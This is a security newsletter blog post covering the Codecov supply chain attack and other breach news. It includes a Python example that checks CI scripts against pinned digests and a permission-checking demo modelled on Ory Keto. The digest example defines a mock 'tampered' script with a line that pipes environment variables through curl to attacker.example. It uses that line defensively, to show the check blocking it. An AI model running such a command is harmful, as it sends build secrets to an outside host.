Hello and welcome to TSD, your weekly blog post with top of mind security issues. TSD began as an internal newsletter that our Security Lead, Daniel Tobin, would circulate to the team each Tuesday. It proved to be a great resource for all of us so we thought, why not share it with all of you? Our hope is that it helps make you just a bit more secure.
Check back here every Tuesday for more TSD or sign up below to stay in the loop!
- A supply chain attack has hit Codecov, the company has confirmed. Ars Technica digs into the attack, in which a tampered copy of Codecov's Bash Uploader exfiltrated secrets (credentials, tokens and keys held in environment variables) from customers' CI build environments. Federal investigators have started looking into the breach, according to Reuters.
- A partner in MAPP, Microsoft's Active Protections Program that shares vulnerability details with security vendors ahead of public release, was removed after it was linked to sharing information with Russia, according to Kim Zetter. MAPP has come under scrutiny since the massive Exchange hack.
- The New Yorker has a deep dive into North Korea’s “cyber forces have raked in billions of dollars for the regime by pulling off schemes ranging from A.T.M. heists to cryptocurrency thefts.”
- SonicWall published fixes for three zero-days that were being actively exploited.
- NPR has a 12-minute listen, The Untold Story of the SolarWinds Hack. The US, meanwhile, announced sanctions against Russia over the SolarWinds hack and election interference. KrebsOnSecurity also has a scoop suggesting that someone in the Commerce Department may have spotted the intrusion as early as August 2020.
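The Codecov item above is a reminder that anything a build pipeline fetches and executes (curl | bash uploaders included) should be verified against a digest pinned in your own repository, not one served from the same place as the script. Codecov has said the tampering was noticed by a customer who compared the shasum of the downloaded script with the published one. The snippet below is an added example written for this post, not Codecov's code: the script contents, the "tampered" variant and the pinned digest are constructed inline so it runs offline.

```python
"""Verify a fetched CI helper script against a pinned SHA-256 digest before executing it.

Added example for TSD, not Codecov's code. All script bodies and digests here are
constructed for the demo; in a real pipeline the pinned digest lives in your repo.
"""
import hashlib
import hmac
import subprocess
import tempfile
from pathlib import Path

# Constructed "published" uploader and the digest you would pin in source control.
EXPECTED_SCRIPT = b"#!/bin/sh\necho uploading coverage report\n"
PINNED_SHA256 = hashlib.sha256(EXPECTED_SCRIPT).hexdigest()

# Constructed tampered variant: same behaviour plus an extra line that ships the
# build's environment variables to a hypothetical collector (attacker.example).
TAMPERED_SCRIPT = EXPECTED_SCRIPT + (
    b"env | curl -s -X POST --data-binary @- https://attacker.example/collect\n"
)


def sha256_of(data: bytes) -> str:
    """Hex SHA-256 of the raw bytes that were actually downloaded."""
    return hashlib.sha256(data).hexdigest()


def verify(data: bytes, pinned: str) -> bool:
    """Compare the computed digest with the pinned one in constant time."""
    return hmac.compare_digest(sha256_of(data), pinned.strip().lower())


def run_verified(data: bytes, pinned: str) -> int:
    """Execute the script with sh only if its digest matches; otherwise refuse.

    Returns the script's exit status. Raises RuntimeError on a digest mismatch,
    which is the outcome you want in CI: fail the job, never run the script.
    """
    if not verify(data, pinned):
        raise RuntimeError(
            f"digest mismatch: got {sha256_of(data)}, pinned {pinned}; refusing to execute"
        )
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as f:
        f.write(data)
        path = Path(f.name)
    try:
        result = subprocess.run(["sh", str(path)], capture_output=True, check=False)
        return result.returncode
    finally:
        path.unlink()


if __name__ == "__main__":
    print("genuine script exit status:", run_verified(EXPECTED_SCRIPT, PINNED_SHA256))
    try:
        run_verified(TAMPERED_SCRIPT, PINNED_SHA256)
    except RuntimeError as err:
        print("tampered script blocked:", err)
```

The important design point is where the pinned digest comes from: it is committed alongside your pipeline definition, so an attacker who can rewrite the script on the vendor's server cannot also rewrite the value you compare against. Rotating the pin when the vendor ships a new version is a reviewed change in your repo, which is exactly the friction you want.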
Owl fun and facts:
“There are only three known northern spotted owls left in the wild in Canada, including just one breeding pair. Their chicks have on occasion been taken for a captive breeding program, to try and boost the species’ prospects.”
“Now Canada and British Columbia have announced a more full-throated response to the potential extinction of the owl within the country’s borders. In tandem with the breeding scheme, the province will enforce a one-year halt to logging in the few remaining old-growth forests that the owl favors, until more permanent protections can be instituted.”
Read more at The Guardian
A Shout Out:
Ory Keto is an open source policy-as-code solution for checking permissions. It is modelled on Google's Zanzibar: access is stored as relation tuples (which subject has which relation to which object), and a permission check asks whether a subject can be reached through those relations.
“If you need to know if a user (or robot, car, service) is allowed to do something – Ory Keto is the right fit for you.”
“Currently, Ory Keto implements the basic API contracts for managing and checking relations (“permissions”) with HTTP and gRPC APIs.”
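To make the "managing and checking relations" idea concrete, here is a small in-memory relation store with a transitive check, written for this post as an added example. It is not Keto's code and does not call Keto's HTTP or gRPC API; it only uses the namespace:object#relation@subject string notation from Keto's documentation, and the namespaces, objects and user ids (files, groups, alice, bob, carol) are made up for the demo.

```python
"""Zanzibar-style relation tuples with a transitive permission check.

Added example for TSD, not Ory Keto's code. The tuple string notation
'namespace:object#relation@subject' follows Keto's documentation; a subject is
either a plain id ('alice') or a subject set ('groups:devs#member'), meaning
"everyone who has relation 'member' on groups:devs". Names here are constructed.
"""
from dataclasses import dataclass
from typing import FrozenSet, Tuple, Union


@dataclass(frozen=True)
class SubjectSet:
    namespace: str
    object: str
    relation: str


Subject = Union[str, SubjectSet]


@dataclass(frozen=True)
class RelationTuple:
    namespace: str
    object: str
    relation: str
    subject: Subject


def _split_ref(ref: str) -> Tuple[str, str, str]:
    """Split 'namespace:object#relation' into its three parts."""
    ns_obj, _, rel = ref.partition("#")
    ns, _, obj = ns_obj.partition(":")
    if not (ns and obj and rel):
        raise ValueError(f"bad reference: {ref!r}")
    return ns, obj, rel


def parse_tuple(s: str) -> RelationTuple:
    """Parse 'namespace:object#relation@subject' (subject may be a subject set)."""
    left, sep, subject = s.partition("@")
    if not sep or not subject:
        raise ValueError(f"missing subject in {s!r}")
    ns, obj, rel = _split_ref(left)
    subj: Subject = SubjectSet(*_split_ref(subject)) if "#" in subject else subject
    return RelationTuple(ns, obj, rel, subj)


class RelationStore:
    """Holds relation tuples and answers 'is subject_id in namespace:object#relation?'."""

    def __init__(self) -> None:
        self.tuples = set()

    def write(self, s: str) -> None:
        self.tuples.add(parse_tuple(s))

    def delete(self, s: str) -> None:
        self.tuples.discard(parse_tuple(s))

    def check(self, namespace: str, object: str, relation: str, subject_id: str,
              max_depth: int = 10) -> bool:
        return self._check(namespace, object, relation, subject_id, max_depth, frozenset())

    def _check(self, ns: str, obj: str, rel: str, sid: str, depth: int,
               seen: FrozenSet[Tuple[str, str, str]]) -> bool:
        # Depth limit and cycle guard: a subject set that (directly or indirectly)
        # refers back to itself must not recurse forever.
        key = (ns, obj, rel)
        if depth <= 0 or key in seen:
            return False
        seen = seen | {key}
        for t in self.tuples:
            if (t.namespace, t.object, t.relation) != key:
                continue
            if isinstance(t.subject, str):
                if t.subject == sid:
                    return True          # direct grant
            elif self._check(t.subject.namespace, t.subject.object,
                             t.subject.relation, sid, depth - 1, seen):
                return True              # granted via a subject set
        return False


def build_sample_store() -> RelationStore:
    """Constructed sample: devs edit the readme, editors can view, bob can only view."""
    store = RelationStore()
    store.write("groups:devs#member@alice")
    store.write("files:readme#editor@groups:devs#member")
    store.write("files:readme#viewer@files:readme#editor")   # editor implies viewer
    store.write("files:readme#viewer@bob")
    store.write("files:loop#viewer@files:loop#viewer")       # deliberate cycle
    return store


if __name__ == "__main__":
    s = build_sample_store()
    print("alice view readme:", s.check("files", "readme", "viewer", "alice"))  # True
    print("bob edit readme:  ", s.check("files", "readme", "editor", "bob"))    # False
```

Two things worth noticing: "editor implies viewer" is not a special rule but just another tuple whose subject is a subject set, which is how this model keeps the check engine simple; and the cycle guard plus depth limit are not optional, because a tuple such as files:loop#viewer@files:loop#viewer is a perfectly valid write and an unguarded check would never terminate.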
That’s owl for now!